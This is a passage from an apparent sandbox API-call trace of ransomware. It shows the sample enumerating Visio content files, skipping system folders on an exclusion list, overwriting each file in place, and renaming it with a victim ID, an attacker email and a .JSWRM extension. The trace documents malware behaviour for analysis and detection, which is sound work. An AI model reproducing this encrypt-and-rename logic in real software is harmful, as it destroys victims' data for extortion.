lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0146.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0146.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0146.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0146.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0146.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0146.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.209] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=132053) returned 1 [0146.209] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x203d0) returned 0x2501e8 [0146.210] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x203d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x203d0, lpOverlapped=0x0) returned 1 [0146.221] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.221] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x203d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x203d0, lpOverlapped=0x0) returned 1 [0146.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.222] CloseHandle (hObject=0x314) returned 1 [0146.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0146.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0146.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0146.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0146.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0146.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0146.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.222] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0146.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0146.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0146.224] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ba18c4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ba18c4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1ba18c4, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1f117, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CABNT_U.VSSX", cAlternateFileName="CABNT_~1.VSS")) returned 1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2=".") returned 1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="..") returned 1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="...") returned 1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="windows") returned -1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="recovery") returned -1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="perflogs") returned -1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="documents and settings") returned -1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="system volume information") returned -1 [0146.224] lstrcmpiW (lpString1="CABNT_U.VSSX", lpString2="msocache") returned -1 [0146.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0146.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0146.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0146.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_U.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_U.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0146.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0146.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0146.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0146.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.226] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127255) returned 1 [0146.226] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f110) returned 0x2501e8 [0146.226] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1f110, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1f110, lpOverlapped=0x0) returned 1 [0146.236] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.236] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1f110, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1f110, lpOverlapped=0x0) returned 1 [0146.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.237] CloseHandle (hObject=0x314) returned 1 [0146.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0146.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0146.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0146.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0146.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0146.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0146.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0146.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0146.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.238] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0146.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0146.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0146.239] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f3541d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f3541d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f3541d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x146a5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CABNT_VISIO2013_M.VSSX", cAlternateFileName="CABNT_~2.VSS")) returned 1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2=".") returned 1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="..") returned 1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="...") returned 1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="windows") returned -1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="recovery") returned -1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="perflogs") returned -1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="documents and settings") returned -1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="system volume information") returned -1 [0146.239] lstrcmpiW (lpString1="CABNT_VISIO2013_M.VSSX", lpString2="msocache") returned -1 [0146.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0146.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x241308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0146.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0146.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_M.VSSX", cchWideChar=22, lpMultiByteStr=0x241060, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_VISIO2013_M.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0146.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0146.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0146.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0146.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_visio2013_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.241] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=83621) returned 1 [0146.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x146a0) returned 0x2501e8 [0146.243] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x146a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x146a0, lpOverlapped=0x0) returned 1 [0146.250] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.250] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x146a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x146a0, lpOverlapped=0x0) returned 1 [0146.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0146.251] CloseHandle (hObject=0x314) returned 1 [0146.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0146.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0146.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0146.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0146.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0146.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0146.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0146.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0146.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0146.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0146.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0146.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0146.252] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_VISIO2013_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CABNT_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cabnt_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0146.253] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x290acd1, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x290acd1, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2930e76, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x13ddb, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CABNT_VISIO2013_U.VSSX", cAlternateFileName="CABNT_~3.VSS")) returned 1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2=".") returned 1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="..") returned 1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="...") returned 1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="documents and settings") returned -1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0146.253] lstrcmpiW (lpString1="CABNT_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0146.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x241010, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0146.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CABNT_VISIO2013_U.VSSX", cchWideChar=22, lpMultiByteStr=0x241100, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CABNT_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 22 [0146.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio 